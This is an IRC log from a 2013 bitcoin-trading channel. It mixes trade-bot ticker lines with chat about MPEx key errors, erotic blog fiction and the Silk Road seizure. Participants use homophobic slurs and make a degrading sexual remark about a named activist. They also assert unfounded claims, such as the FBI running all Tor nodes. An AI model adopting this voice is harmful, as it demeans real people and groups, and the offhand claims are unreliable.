0.0002302 = 1.4777 BTC [-] Oct 01 20:50:39 mircea is here? Oct 01 20:51:04 need help Oct 01 20:51:05 ping mircea_popescu Oct 01 20:51:21 heya Oct 01 20:51:41 Rick__ sup ? Oct 01 20:52:03 I just sent 2 email to you Oct 01 20:52:31 i cant use mpex,it says unrecognized sigeniture Oct 01 20:52:45 well yeah. you have to resend public key. Oct 01 20:52:51 it says in the latest article on the topic too. Oct 01 20:52:52 what happened with my public key Oct 01 20:52:59 okay,you lost it? Oct 01 20:53:13 im just checking them. Oct 01 20:53:33 okay,i will send it to you now,thank you Oct 01 20:53:41 np. Oct 01 20:56:38 I forgot how to export just public key....... Oct 01 20:57:57 got it Oct 01 20:58:57 see faq it has commands there. Oct 01 21:00:25 just sent it:) Oct 01 21:00:38 mircea_popescu: I'm in the same boat, but I've resend the key a couple of days ago Oct 01 21:00:53 Something's wrong? Oct 01 21:01:14 have you checked since ? Oct 01 21:01:29 Yes Oct 01 21:01:44 Just checked Oct 01 21:01:49 Again Oct 01 21:01:50 WHAT THE FCK Oct 01 21:01:50 http://bitcoin-otc.com/viewgpg.php?nick=kakobrekla Oct 01 21:01:51 #bitcoin-otc gpg key data Oct 01 21:01:52 ops Oct 01 21:01:57 https://tradehill.com/auctions Oct 01 21:01:58 this Oct 01 21:01:58 Tradehill Oct 01 21:02:19 rdponticelli pm me your email addy i'll check. Oct 01 21:03:18 "since we cant have exchange, lets sell asic, its basically same thing?" Oct 01 21:03:26 [BTCTC] [LABCOIN] 6581 @ 0.00022578 = 1.4859 BTC [-] {7} Oct 01 21:04:04 kakobrekla kenna, doing anything to scam a little more. who knows, maybe it works. Oct 01 21:04:46 also Yifu has a new nick on the forums Oct 01 21:04:52 he is now known as "YiFuck" Oct 01 21:05:43 lol Oct 01 21:06:00 anyway, it will be hard to outdo the walletbit fiasco they managed on the 2nd batch Oct 01 21:06:15 but tradehill auctions Oct 01 21:11:21 trade bfl preorders, avalon chips, what's next? Oct 01 21:11:32 bitcoinica debt Oct 01 21:11:35 mtgoxusd Oct 01 21:14:15 https://bitcointalk.org/index.php?topic=290799.msg3278841#msg3278841 Oct 01 21:14:16 lol Oct 01 21:14:16 [ANN] KRAKEN.COM - Exchange Now Open with Live Trading USD, EUR, BTC, LTC Oct 01 21:14:37 [BTCTC] [ASICMINER-PT] 1 @ 1.101 BTC [+] Oct 01 21:14:37 [HAVELOCK] [AM1] 1 @ 1.2 BTC [-] Oct 01 21:16:32 so kraken.com went nowhere or what ? Oct 01 21:16:39 [BTCTC] [ASICMINER-PT] 1 @ 1.1 BTC [-] Oct 01 21:16:39 [HAVELOCK] [NEOBEE] 75 @ 0.00295 = 0.2213 BTC [+] Oct 01 21:16:46 >But 0,02 BTC total volume in 24 h... Oct 01 21:17:40 [HAVELOCK] [NEOBEE] 1119 @ 0.002901 = 3.2462 BTC [-] {2} Oct 01 21:17:50 lol, 'if you want to help...' Oct 01 21:18:41 [BTCTC] [ASICMINER-PT] 5 @ 1.1 = 5.5 BTC [-] {3} Oct 01 21:18:48 weird. Oct 01 21:19:42 [HAVELOCK] [NEOBEE] 81 @ 0.0029 = 0.2349 BTC [-] {2} Oct 01 21:19:57 well, are people able to wire fiat to them? Oct 01 21:20:13 bitcoin-central has no volume because no one can… yet Oct 01 21:24:06 any eta to that Oct 01 21:24:23 Coming Soon Oct 01 21:24:40 their banking partner seems to be in care of the verification Oct 01 21:24:48 so… months? :| Oct 01 21:24:56 in charge* Oct 01 21:26:53 hey TAT_Investments can I transfer asicminer-pt shares on btct.co to havelock now or do I need to wait until after Thursday? Oct 01 21:29:53 [BTCTC] [PETA-MINE] 1 @ 0.66 BTC [+] Oct 01 21:33:03 qxzn: 42 Oct 01 21:37:21 imsaguy thanks :P Oct 01 21:41:37 coming soon is a myth Oct 01 21:42:55 it's okay now? Oct 01 21:47:22 Rick__ you tell me ? Oct 01 21:47:56 okay let me try Oct 01 21:50:26 nope,it still Unrecognized signature Oct 01 21:50:54 it's Unrecognized signature Oct 01 21:51:01 still Oct 01 21:52:11 uh. Oct 01 21:52:36 what's the problem?is there anything i can do? Oct 01 21:52:39 well let Oct 01 21:52:48 hey TAT_Investments can I transfer asicminer-pt shares on btct.co to havelock now or do I need to wait until after Thursday? Oct 01 21:52:53 's debug this. you know how to use !mp ? Oct 01 21:53:10 hum i get that too mp Oct 01 21:53:22 conspiraci. Oct 01 21:53:33 kakobrekla make a pastebin thing so i can trace what's going on. Oct 01 21:53:59 (for instance... are you using the new mpex key ?) Oct 01 21:54:10 the one from faq Oct 01 21:54:13 okay,so basicly i can just wait? Oct 01 21:54:22 Rick__ wait one second here we're working on it. Oct 01 21:54:22 !mp http://dpaste.com/1402563/ Oct 01 21:54:23 Processing. Oct 01 21:54:25 Response: error Oct 01 21:54:31 hrm Oct 01 21:54:32 that's the old key. Oct 01 21:54:36 I have to hit the sack now Oct 01 21:54:40 http://trilema.com/2013/mpex-status-report/ Oct 01 21:54:41 MPEx - Status Report pe Trilema - Un blog de Mircea Popescu. Oct 01 21:54:51 Rick__ so see you tomorro. Oct 01 21:54:56 yeah Oct 01 21:54:59 i know for a fact people have been able to use it, so Oct 01 21:55:01 thank you Oct 01 21:55:08 faq has old key? Oct 01 21:55:16 checking. Oct 01 21:55:31 heh i guess it does. one minute. Oct 01 21:55:40 thats the problem then Oct 01 21:56:19 [HAVELOCK] [AM100] 124 @ 0.01122345 = 1.3917 BTC [-] {8} Oct 01 21:57:12 !mp http://dpaste.com/1402574/ Oct 01 21:57:13 Processing. Oct 01 21:57:15 Response: error Oct 01 21:57:19 gtfo Oct 01 21:57:35 what's response error anyway, it should give it as a paste neh ? Oct 01 21:58:02 seems like it didnt reach mpex at all Oct 01 21:58:21 [BTCTC] [FN] [DMS.SELLING] 585 @ 0.00537588 = 3.1449 BTC [+] {2} Oct 01 21:59:22 [BTCTC] [FN] [DMS.SELLING] 115 @ 0.005386 = 0.6194 BTC [+] Oct 01 22:00:23 [BTCTC] [DMS.MINING] 700 @ 0.00139944 = 0.9796 BTC [+] {2} Oct 01 22:01:20 ;;help Oct 01 22:01:21 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Oct 01 22:01:29 !facts Oct 01 22:02:09 !diff Oct 01 22:03:25 !mp http://dpaste.com/1402580/ Oct 01 22:03:26 Processing. Oct 01 22:03:28 Response: http://dpaste.com/1402581/plain/ Oct 01 22:03:42 good as new Oct 01 22:03:43 !dif Oct 01 22:03:54 ;;bc,stats Oct 01 22:03:56 .d Oct 01 22:03:56 148819199.80509 | Next Diff in 933 blocks | Estimated Change: 21.3538% in 5d 1h 59m 30s Oct 01 22:03:56 Current Blocks: 261146 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 933 blocks | Next Difficulty In About: 4 days, 17 hours, 5 minutes, and 27 seconds | Next Difficulty Estimate: 180751453.222 | Estimated Percent Change: 21.45708 Oct 01 22:04:00 mkay Oct 01 22:04:04 danke Oct 01 22:04:07 finke **** BEGIN LOGGING AT Wed Oct 2 05:10:07 2013 Oct 02 05:10:17 bad for your mental health Oct 02 05:10:50 Welcome, mircea_popescu. Oct 02 05:11:10 those two lines... Oct 02 05:15:54 [HAVELOCK] [VTX] 2 @ 0.4806 = 0.9612 BTC [-] Oct 02 05:15:55 [HAVELOCK] [AM100] 40 @ 0.01080001 = 0.432 BTC [-] Oct 02 05:20:59 [MPEX] [S.MPOE] 6041 @ 0.00089541 = 5.4092 BTC [+] {3} Oct 02 05:21:55 http://www.theguardian.com/music/2013/sep/23/pussy-riot-hunger-strike-nadezhda-tolokonnikova Oct 02 05:22:05 Pussy Riot's Nadezhda Tolokonnikova: Why I have gone on hunger strike | Music | theguardian.com Oct 02 05:22:15 what, still ? Oct 02 05:22:36 aparently ended a few hrs ago Oct 02 05:22:46 she spends half the year on hunger strike because if she deosn't she gets fat and if she's fat da police no longer want to grab her tits. Oct 02 05:22:47 i was unaware of this completley Oct 02 05:24:02 [HAVELOCK] [HIM] 530 @ 0.06624527 = 35.11 BTC [+] {5} Oct 02 05:25:03 [HAVELOCK] [NEOBEE] 2650 @ 0.0029 = 7.685 BTC [-] {3} Oct 02 05:38:16 [HAVELOCK] [VTX] 1 @ 0.48 BTC [-] Oct 02 05:38:17 [MPEX] [S.MPOE] 2700 @ 0.00089891 = 2.4271 BTC [+] {2} Oct 02 05:43:21 [HAVELOCK] [AM100] 122 @ 0.01022188 = 1.2471 BTC [-] {6} Oct 02 05:44:22 [HAVELOCK] [AM100] 78 @ 0.00943525 = 0.7359 BTC [-] {6} Oct 02 05:46:23 [BTCTC] [ASICMINER-PT] 25 @ 1.071 = 26.775 BTC [-] Oct 02 05:50:27 [HAVELOCK] [B] [XBOND] 100 @ 0.001171 = 0.1171 BTC [+] Oct 02 05:53:31 [MPEX] [S.MPOE] 1577 @ 0.00089831 = 1.4166 BTC [-] Oct 02 06:02:40 [BTCTC] [ASICMINER-PT] 1 @ 1.12 BTC [+] Oct 02 06:04:42 [BTCTC] [ASICMINER-PT] 7 @ 1.12 = 7.84 BTC [+] Oct 02 06:06:44 [BTCTC] [LABCOIN] 12787 @ 0.00022711 = 2.9041 BTC [-] {8} Oct 02 06:10:48 [HAVELOCK] [AM100] 20 @ 0.00920001 = 0.184 BTC [-] Oct 02 06:11:58 "Your articles are definitely worth it, great stuff. I get a lot out of your writing." << testimonials. Oct 02 06:14:52 [BTCTC] [BASIC-MINING] 23 @ 0.0427 = 0.9821 BTC [+] Oct 02 06:17:55 [MPEX] [S.MPOE] 650 @ 0.00089831 = 0.5839 BTC [-] Oct 02 06:18:56 [HAVELOCK] [AM100] 17 @ 0.01 = 0.17 BTC [+] Oct 02 06:23:00 [BTCTC] [BASIC-MINING] 149 @ 0.04025778 = 5.9984 BTC [-] {7} Oct 02 06:24:01 [BTCTC] [LABCOIN] 40000 @ 0.00022301 = 8.9204 BTC [-] {9} Oct 02 06:25:02 [MPEX] [S.MPOE] 2489 @ 0.00090097 = 2.2425 BTC [+] {2} Oct 02 06:40:17 [MPEX] [S.MPOE] 1900 @ 0.00090486 = 1.7192 BTC [+] Oct 02 06:56:34 [HAVELOCK] [HIM] 2 @ 0.08 = 0.16 BTC [+] Oct 02 06:58:36 [HAVELOCK] [CBTC] 2000 @ 0.00029042 = 0.5808 BTC [-] {3} Oct 02 07:11:49 [HAVELOCK] [AM100] 33 @ 0.01066999 = 0.3521 BTC [+] Oct 02 07:12:50 [HAVELOCK] [AM100] 700 @ 0.01079164 = 7.5541 BTC [+] {7} Oct 02 07:13:51 [HAVELOCK] [AM100] 46 @ 0.01174455 = 0.5402 BTC [+] {2} Oct 02 07:14:52 [HAVELOCK] [AM100] 149 @ 0.01190837 = 1.7743 BTC [+] {4} Oct 02 07:33:06 .d Oct 02 07:33:06 148819199.80509 | Next Diff in 872 blocks | Estimated Change: 20.2847% in 4d 19h 50m 12s Oct 02 07:46:23 [MPEX] [S.MPOE] 807 @ 0.00090486 = 0.7302 BTC [+] Oct 02 07:56:33 [BTCTC] [ASICMINER-PT] 1 @ 1.081 BTC [-] Oct 02 08:01:38 [BTCTC] [LABCOIN] 1250 @ 0.00022264 = 0.2783 BTC [-] {3} Oct 02 08:02:39 [BTCTC] [ASICMINER-PT] 1 @ 1.139 BTC [+] Oct 02 08:10:47 [BTCTC] [LABCOIN] 5294 @ 0.0002225 = 1.1779 BTC [-] {2} Oct 02 08:11:48 [BTCTC] [LABCOIN] 706 @ 0.0002223 = 0.1569 BTC [-] Oct 02 08:12:49 [MPEX] [S.MPOE] 1227 @ 0.00090486 = 1.1103 BTC [+] Oct 02 08:12:49 [BTCTC] [ESECURITYSABTC] 18 @ 0.09986 = 1.7975 BTC [-] Oct 02 08:13:50 [BTCTC] [ESECURITYSABTC] 3 @ 0.1001 = 0.3003 BTC [+] Oct 02 08:15:52 [BTCTC] [LABCOIN] 3000 @ 0.0002223 = 0.6669 BTC [-] Oct 02 08:16:53 [BTCTC] [ASICMINER-PT] 6 @ 1.13933333 = 6.836 BTC [+] {3} Oct 02 08:16:53 [BTCTC] [BASIC-MINING] 32 @ 0.0427 = 1.3664 BTC [+] Oct 02 08:17:54 [BTCTC] [COGNITIVE] 3 @ 0.093 = 0.279 BTC [+] Oct 02 08:21:58 [MPEX] [S.MPOE] 550 @ 0.00092 = 0.506 BTC [+] Oct 02 08:23:32 http://www.youtube.com/watch?v=nQsgwt8Rk1I Oct 02 08:23:33 Enforcing Claims: How to Get Your A4V to Work 100% of the Time - YouTube Oct 02 08:23:40 almost as funny as the forum securities. Oct 02 08:28:18 its about to get funnier again Oct 02 08:34:10 [MPEX] [S.MPOE] 2400 @ 0.00092 = 2.208 BTC [+] Oct 02 08:41:18 [BTCTC] [RSM] 135 @ 0.002101 = 0.2836 BTC [-] {2} Oct 02 08:44:21 [BTCTC] [CRYPTO-TRADE] 6 @ 0.17 = 1.02 BTC [-] Oct 02 08:46:23 [BTCTC] [BITVPS] 122 @ 0.00155999 = 0.1903 BTC [+] {2} Oct 02 08:51:28 [MPEX] [S.MPOE] 366 @ 0.0009196 = 0.3366 BTC [-] Oct 02 09:15:12 .news Oct 02 09:30:05 [BTCTC] [BASIC-MINING] 392 @ 0.0427 = 16.7384 BTC [+] Oct 02 09:36:35 emp resistant vibrator failure sets tongues wagging Oct 02 11:23:27 http://www.youtube.com/watch?v=_lTAT0dZMRw Oct 02 11:23:27 Scott McKenzie - San Francisco REMIX - YouTube Oct 02 11:34:00 mircea_popescu: http://www.dailydot.com/lol/bitcoin-erotic-novel-king-bitcoin/ Oct 02 11:35:08 The first line of the novel shows Brad, a popular kid with a cheerleader girlfriend, mocking Oct 02 11:35:09 mk nm. Oct 02 11:35:19 lol Oct 02 11:35:47 wat Oct 02 11:36:02 brad looks to homo, should have had mp shirt open on the cover Oct 02 11:37:00 lmao "free sample ended with Atlas crying on the floor as his mining rig caught fire" Oct 02 11:37:44 she really needs to be introduced to trilema... seems to run out of inspiration Oct 02 11:37:53 30ish and a special sort of romantic, mircea has amassed an enormous wealth over a few short years, the girls want it, and he wants the girlsd Oct 02 11:43:24 jurov actually there has been much better porn available on trilema for bitcoin for a year + by now. Oct 02 11:43:36 let me do a quick wordcunt here. Oct 02 11:44:08 yes i mean she neesd to get inspired by trilema, not the other way around Oct 02 11:44:31 i wonder whether kathleen, author of cougars like it hard is her real name Oct 02 11:45:21 or his hehe Oct 02 11:45:22 http://trilema.com/filosofia-din-budoar-dragi-libertini < 9 articles, cca 10k words, much better rewrite of de sade Oct 02 11:45:24 Filosofia din budoar : Dragi libertini, pe Trilema - Un blog de Mircea Popescu. Oct 02 11:45:41 http://trilema.com/capitolul-i-in-care-profesorul-fad-invitat-de-doua-studente-la-„roata-norocului“-descopera-biftecul-tartar-subcapitolul-i1 Oct 02 11:46:00 5 chapters, a rewrite of a romanian novelist's novel to be much better than the origianl, like 10k words Oct 02 11:46:32 http://trilema.com/delicioasa-aventura-a-lui-robert-i < gay pron, 100 word bits, like 4k total unfinished Oct 02 11:46:33 Delicioasa aventura a lui Robert - I pe Trilema - Un blog de Mircea Popescu. Oct 02 11:46:46 a unique romantic Oct 02 11:46:56 http://trilema.com/la-control-i public nudity and stuff, Oct 02 11:46:57 La control - I pe Trilema - Un blog de Mircea Popescu. Oct 02 11:47:20 http://trilema.com/educatia-tinerei-z-i < like story of o, except well written Oct 02 11:47:21 Educatia tinerei Z. - I pe Trilema - Un blog de Mircea Popescu. Oct 02 11:47:31 http://trilema.com/urme-sarate-i Oct 02 11:47:32 peeing Oct 02 11:47:32 Urme sarate - I pe Trilema - Un blog de Mircea Popescu. Oct 02 11:47:56 http://trilema.com/povestea-elizei-i girl's journal, pretty heavy bdsm Oct 02 11:47:56 Povestea Elizei - I pe Trilema - Un blog de Mircea Popescu. Oct 02 11:48:00 and i think there'sa bvunch more. Oct 02 11:48:30 babelfish dont do too well with your etotic Oct 02 11:48:34 so there. i claim the "first", and it was actually romanian. Oct 02 11:48:49 Vexual i imagine it makes it very lol. Oct 02 11:49:08 anyway, i'm 3k words into my latest article, so i'll bbs. Oct 02 11:49:10 im sure my lady could fiddle to it Oct 02 11:49:11 seems i have struck a chord XD Oct 02 11:50:02 perhaps you could try your hand at something more trivial and english mp Oct 02 11:50:32 get more chick into bitcoin Oct 02 11:51:23 only you could monetise literotica Oct 02 11:52:17 it would require champagne flair Oct 02 11:54:26 please dont think im joking Oct 02 11:55:09 the joining fee makes it hotter Oct 02 11:55:25 vexual what are you smoking? Oct 02 11:55:51 naught Oct 02 11:55:57 a little tobacco Oct 02 11:57:11 i have better idea... euloria should have an adult component Oct 02 11:58:40 id make it, but it would look less like a high class sex club and more like an 8 year old spaniards blog Oct 02 12:02:25 html skills yo Oct 02 12:06:37 seriously, wheres the financial incentive for hot chicks to upload their erotic thoughts? Oct 02 12:07:33 id pay for trilemma if it had cip Oct 02 12:07:39 *vip Oct 02 12:08:15 not all my typos are purposeful Oct 02 12:08:39 http://www.youtube.com/watch?v=AcuRxJ-yLXU Oct 02 12:08:39 Bob Dylan - Like a Rolling Stone (USA) - YouTube Oct 02 12:12:35 but really, that would be very funny feature.. euloria players can refill mana or whatever by having sex Oct 02 12:13:05 with a twist that if they have low charisma or low sex drive (they had sex recently) Oct 02 12:13:26 things would go sour and mana will get damaged instead or money stolen Oct 02 12:13:40 my neigbours have more interesting sex than i do Oct 02 12:16:13 then the actual animation can be some randomly chosen position Oct 02 12:18:22 what is euloria? Oct 02 12:18:27 Vexual it does. Oct 02 12:18:58 jurov well seeing how everyone will kinda have to get married... Oct 02 12:19:18 i think my neighbours have diplomatic luggage Oct 02 12:19:27 why married? there would be brothels Oct 02 12:19:39 perhaps first MMORPG with player operated brothels Oct 02 12:19:47 sex skills that you can link for higher exp Oct 02 12:19:51 lulz Oct 02 12:20:54 this would actually sell Oct 02 12:21:09 has it got oculus? Oct 02 12:21:18 just make a whole alternate porn skin for th egame Oct 02 12:22:31 jerusalem makes better x than germany Oct 02 12:23:11 state of the art baby Oct 02 12:24:22 its not a race, its not a religion, i dont get it Oct 02 12:25:47 proper genes are fucked.. Oct 02 12:26:07 earthquake tiem Oct 02 12:26:39 dub that'll certanly be possible. Oct 02 12:26:56 theres a market for sure Oct 02 12:27:00 look at second life Oct 02 12:27:48 this should be your focus tbh Oct 02 12:29:53 can i get bitcoins drawing porno in 3ds? Oct 02 12:31:47 imagine renoir with his thumb out... nipple x10% Oct 02 12:38:13 No havelock y u offline? **** BEGIN LOGGING AT Wed Oct 2 15:50:05 2013 Oct 02 15:54:39 .d Oct 02 15:54:39 148819199.80509 | Next Diff in 806 blocks | Estimated Change: 20.9301% in 4d 10h 5m 30s Oct 02 15:56:38 https://bitcointalk.org/index.php?topic=99497.msg3284352#msg3284352 Oct 02 15:56:39 ASICMINER: Entering the Future of ASIC Mining by Inventing It Oct 02 15:57:58 ooh Oct 02 15:58:17 what, still ? Oct 02 15:59:40 I always say "ooh" when FC speaks. Oct 02 16:06:35 https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash4/1233169_10151711906516840_227213887_o.jpg Oct 02 16:07:27 and "Yes, I have even tried replacing everything inside of it. Still doesn't work." Oct 02 16:09:09 lol Oct 02 16:27:18 what, i was on a break Oct 02 16:30:22 must be some really low divs coming up if they're giving a update before divs Oct 02 16:32:14 [BTCTC] [LABCOIN] 2500 @ 0.00022 = 0.55 BTC [-] {2} Oct 02 16:37:19 [BTCTC] [FIMB] 207 @ 0.00914364 = 1.8927 BTC [-] {4} Oct 02 16:37:54 http://www.theblaze.com/wp-content/uploads/2013/09/Iran-Dishes-1.jpg Oct 02 16:38:45 ^ Is that art? Oct 02 16:38:46 those look like bar tables Oct 02 16:39:21 [BTCTC] [BTC-BOND] 2106 @ 0.00980279 = 20.6447 BTC [-] {6} Oct 02 16:43:28 what are those zany Iranians up to now.. Oct 02 16:44:23 reopening us government? Oct 02 16:45:10 yea first i thought o look, beardy faggot on a tank in a french cafe Oct 02 16:45:27 [BTCTC] [ASICMINER-PT] 6 @ 1.035 = 6.21 BTC [-] Oct 02 16:48:59 http://d24w6bsrhbeh9d.cloudfront.net/photo/aG9jO57_460s.jpg Oct 02 16:49:19 ^ Oct 02 16:50:00 that looks like a scam link Oct 02 16:50:31 http://trilema.com/2013/the-sops-or-what-might-you-expect-from-government-clerks/ Oct 02 16:50:32 The SOPS, or what might you expect from government clerks pe Trilema - Un blog de Mircea Popescu. Oct 02 16:51:03 long, do you have a pic to summarize it Oct 02 16:54:36 [BTCTC] [LABCOIN] 5300 @ 0.00022 = 1.166 BTC [-] Oct 02 16:56:38 [BTCTC] [ASICMINER-PT] 2 @ 1.01 = 2.02 BTC [-] Oct 02 17:00:05 "i woke up this morning like fuck da world" - Jeezy Oct 02 17:00:11 Mr. Popescu Oct 02 17:00:33 I'm going by the rap moniker lil' pescu Oct 02 17:00:38 do I have to pay you royalties? Oct 02 17:00:42 [MPEX] [S.MPOE] 4300 @ 0.00091793 = 3.9471 BTC [-] {3} Oct 02 17:01:07 naaaaas Oct 02 17:01:43 [HAVELOCK] [AM1] 1 @ 1.16197999 BTC [-] Oct 02 17:01:44 [MPEX] [S.MPOE] 1386 @ 0.00091645 = 1.2702 BTC [-] Oct 02 17:01:45 [BTCTC] [LABCOIN] 20000 @ 0.00022 = 4.4 BTC [-] {2} Oct 02 17:04:28 suhweet, 'lil 'pescu in da house yo! Oct 02 17:05:47 [BTCTC] [ASICMINER-PT] 2 @ 1.001 = 2.002 BTC [-] Oct 02 17:06:48 [BTCTC] [ASICMINER-PT] 3 @ 1 = 3 BTC [-] Oct 02 17:07:49 [BTCTC] [ASICMINER-PT] 10 @ 0.99 = 9.9 BTC [-] Oct 02 17:08:50 [BTCTC] [ASICMINER-PT] 10 @ 0.98006999 = 9.8007 BTC [-] {5} Oct 02 17:09:39 bah dumb tablet Oct 02 17:11:53 [HAVELOCK] [CFIG] 3 @ 0.11100009 = 0.333 BTC [-] Oct 02 17:12:54 [HAVELOCK] [CFIG] 77 @ 0.11003896 = 8.473 BTC [-] {3} Oct 02 17:16:58 [BTCTC] [LABCOIN] 2290 @ 0.00022 = 0.5038 BTC [-] {2} Oct 02 17:20:01 [BTCTC] [LABCOIN] 2000 @ 0.000211 = 0.422 BTC [-] Oct 02 17:21:02 [HAVELOCK] [CFIG] 5 @ 0.14 = 0.7 BTC [+] Oct 02 17:21:56 http://www.reddit.com/r/Bitcoin/comments/1nkoju/bitcoin_core_dev_websites_do_not_need_passwords/ Oct 02 17:21:58 Bitcoin core dev: websites do not need passwords : Bitcoin Oct 02 17:22:03 [MPEX] [S.MPOE] 650 @ 0.00091645 = 0.5957 BTC [-] Oct 02 17:23:04 [BTCTC] [LABCOIN] 9807 @ 0.00020302 = 1.991 BTC [-] {5} Oct 02 17:25:06 [BTCTC] [LABCOIN] 6152 @ 0.00020007 = 1.2308 BTC [-] {3} Oct 02 17:25:52 herp. how can this dood be such an asshole ? Oct 02 17:26:08 mpex has been using the *superior* gpg signature method for two years now. Oct 02 17:26:36 all he has to say is "please use our braindamaged reimplementation" ? no mention of anything, just like that, idiot garzik has invented the world. Oct 02 17:26:39 fucking outrageous. Oct 02 17:27:25 hehe yes Oct 02 17:27:30 that's why i'm posting this Oct 02 17:30:11 [BTCTC] [LABCOIN] 1000 @ 0.0002003 = 0.2003 BTC [+] Oct 02 17:31:12 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 02 17:33:03 last i looked at it it was still broken, because god forbid they actually specify anything. Oct 02 17:34:14 [HAVELOCK] [AM100] 30 @ 0.0095 = 0.285 BTC [-] {2} Oct 02 17:36:16 [BTCTC] [LABCOIN] 7265 @ 0.00019646 = 1.4273 BTC [-] {3} Oct 02 17:36:17 [HAVELOCK] [AM100] 70 @ 0.00957857 = 0.6705 BTC [+] {3} Oct 02 17:37:17 [BTCTC] [LABCOIN] 5000 @ 0.0002002 = 1.001 BTC [+] Oct 02 17:38:19 [BTCTC] [LABCOIN] 697 @ 0.0002002 = 0.1395 BTC [+] Oct 02 17:40:21 [HAVELOCK] [AM100] 35 @ 0.012 = 0.42 BTC [+] Oct 02 17:46:27 [HAVELOCK] [AM1] 2 @ 1.16197999 = 2.324 BTC [-] {2} Oct 02 17:50:31 [MPEX] [S.MPOE] 1800 @ 0.00091635 = 1.6494 BTC [-] Oct 02 17:55:36 [HAVELOCK] [VTX] 8 @ 0.45146374 = 3.6117 BTC [-] {5} Oct 02 17:56:37 [HAVELOCK] [VTX] 10 @ 0.41900499 = 4.19 BTC [-] {3} Oct 02 17:56:38 [BTCTC] [BTC-BOND] 203 @ 0.00997 = 2.0239 BTC [+] Oct 02 17:57:38 [HAVELOCK] [VTX] 3 @ 0.4034 = 1.2102 BTC [-] {2} Oct 02 17:57:39 [BTCTC] [BTC-BOND] 281 @ 0.00998 = 2.8044 BTC [+] Oct 02 18:01:53 would be nice to have GPG-based bitcoin wallet Oct 02 18:02:11 prolly needs cryptographer to decide how best to conver RSA/DSA privkey to bitcoin 256bit one Oct 02 18:04:45 [HAVELOCK] [B] [XBOND] 1102 @ 0.001208 = 1.3312 BTC [+] Oct 02 18:04:52 or, better, to be used as seed for electrum,to get a seed for deterministic keys Oct 02 18:04:55 seems a hater discovered bash Oct 02 18:05:20 kakobrekla what? Oct 02 18:05:49 everything got downvoted to the ground Oct 02 18:05:56 lol Oct 02 18:06:47 [HAVELOCK] [VTX] 10 @ 0.48048 = 4.8048 BTC [+] {2} Oct 02 18:06:48 [HAVELOCK] [CFIG] 18 @ 0.116 = 2.088 BTC [-] {2} Oct 02 18:09:29 jurov or better, make the bicoin key 16 bits. Oct 02 18:09:43 which should be enough for everyone. Oct 02 18:13:50 and, if they absolutely strive improve over gpg, need to better protect input/output from copy/paste/encoding mishaps Oct 02 18:14:12 except they don't strive to improve over gpg. Oct 02 18:14:29 much in the style of bitcoin retardation, they strive to half implement the half of a good solution they understood, Oct 02 18:14:42 and then pretend as if this braindamaged mess is due some credit or recognition or something. Oct 02 18:14:55 [BTCTC] [CRYPTO-TRADE] 17 @ 0.17 = 2.89 BTC [-] Oct 02 18:15:15 i'd absolutely love to see someone improve on gpg. Oct 02 18:17:58 [HAVELOCK] [HIM] 9 @ 0.13966196 = 1.257 BTC [+] {8} Oct 02 18:18:59 [HAVELOCK] [AM1] 2 @ 1.16197999 = 2.324 BTC [-] Oct 02 18:23:03 [HAVELOCK] [AM100] 30 @ 0.01189633 = 0.3569 BTC [+] {3} Oct 02 18:24:04 [HAVELOCK] [AM100] 12 @ 0.0119 = 0.1428 BTC [+] Oct 02 18:25:05 [HAVELOCK] [AM100] 15 @ 0.012 = 0.18 BTC [+] Oct 02 18:29:09 [HAVELOCK] [AM1] 12 @ 1.02477506 = 12.2973 BTC [-] {9} Oct 02 18:30:10 [HAVELOCK] [VTX] 1 @ 0.4806 BTC [+] Oct 02 18:33:13 [HAVELOCK] [HIM] 2 @ 0.14489999 = 0.2898 BTC [+] {2} Oct 02 18:35:15 has SR really been seized? http://krebsonsecurity.com/wp-content/uploads/2013/10/silkroadseize.png Oct 02 18:36:09 http://krebsonsecurity.com/wp-content/uploads/2013/10/UlbrichtCriminalComplaint.pdf Oct 02 18:36:19 i think this is because of govt shutdown Oct 02 18:36:53 wtf Oct 02 18:37:10 http://www.reddit.com/r/SilkRoad/comments/1nl41m/hidden_site_has_been_seized_image_appearing_when/ Oct 02 18:37:10 Hidden site has been seized image appearing when accessing SR - Is this a joke? : SilkRoad Oct 02 18:37:34 "It's a joke because the government went down yet all of these agencies are still functioning. It's a stab at our government" Oct 02 18:40:20 [MPEX] [S.MPOE] 800 @ 0.00091714 = 0.7337 BTC [+] Oct 02 18:40:20 [HAVELOCK] [CFIG] 1 @ 0.1411 BTC [+] Oct 02 18:42:08 kakobrekla lmao Oct 02 18:42:21 pizzaman1337 what "site" ? Oct 02 18:42:22 [BTCTC] [CRYPTO-TRADE] 1 @ 0.17 BTC [-] Oct 02 18:44:04 sr = silkroad Oct 02 18:44:47 mircea_popescu: silkroad. http://silkroadvb5piz3r.onion/ Oct 02 18:45:30 my point was just that it's not really a "site" Oct 02 18:45:39 they seized what, the onion address ?! Oct 02 18:45:50 normally these seizures refer to domain names. Oct 02 18:46:19 like Biggy said, FBI runs all the tor nodes Oct 02 18:46:41 I guess we'll find out if he had a backup plan. Oct 02 18:46:42 http://www.reuters.com/article/2013/10/02/crime-silkroad-raid-idUSL1N0HS12C20131002 Oct 02 18:46:43 FBI raids alleged online drug market Silk Road, arrests owner Oct 02 18:47:27 woah Oct 02 18:47:27 [HAVELOCK] [AM100] 28 @ 0.01200713 = 0.3362 BTC [+] {3} Oct 02 18:47:29 wait the guy was in the states? Oct 02 18:47:30 just leafing through that, pdf, page 21: Oct 02 18:47:34 is he like insane? Oct 02 18:47:51 "DPR solicited a murder for hire of a certain Silk Road user" Oct 02 18:48:02 so it ends then huh. Oct 02 18:48:11 kakobrekla not everyone can be in somaliah Oct 02 18:48:20 :p Oct 02 18:48:49 Ross William Ulbricht Oct 02 18:48:52 not a bad name. Oct 02 18:49:22 $3.6M in BTC seized Oct 02 18:49:35 hah! i recall arguing with people in 2012 about how silkroad isn't really all that big. Oct 02 18:49:45 i guess i was right and them people were wrong huh. Oct 02 18:51:30 page 6, "All told, the site has generated sales revenue totaling over 9.5 million Bitcoins and collected comissions from these sales totaling over 600,000 Bitcoins" Oct 02 18:52:54 and yet mysteriously all it had was 30k. Oct 02 18:53:20 this is where bogus da claims meet bogus crowdthinking expectations. facts are on the other side of the river. Oct 02 18:53:33 [HAVELOCK] 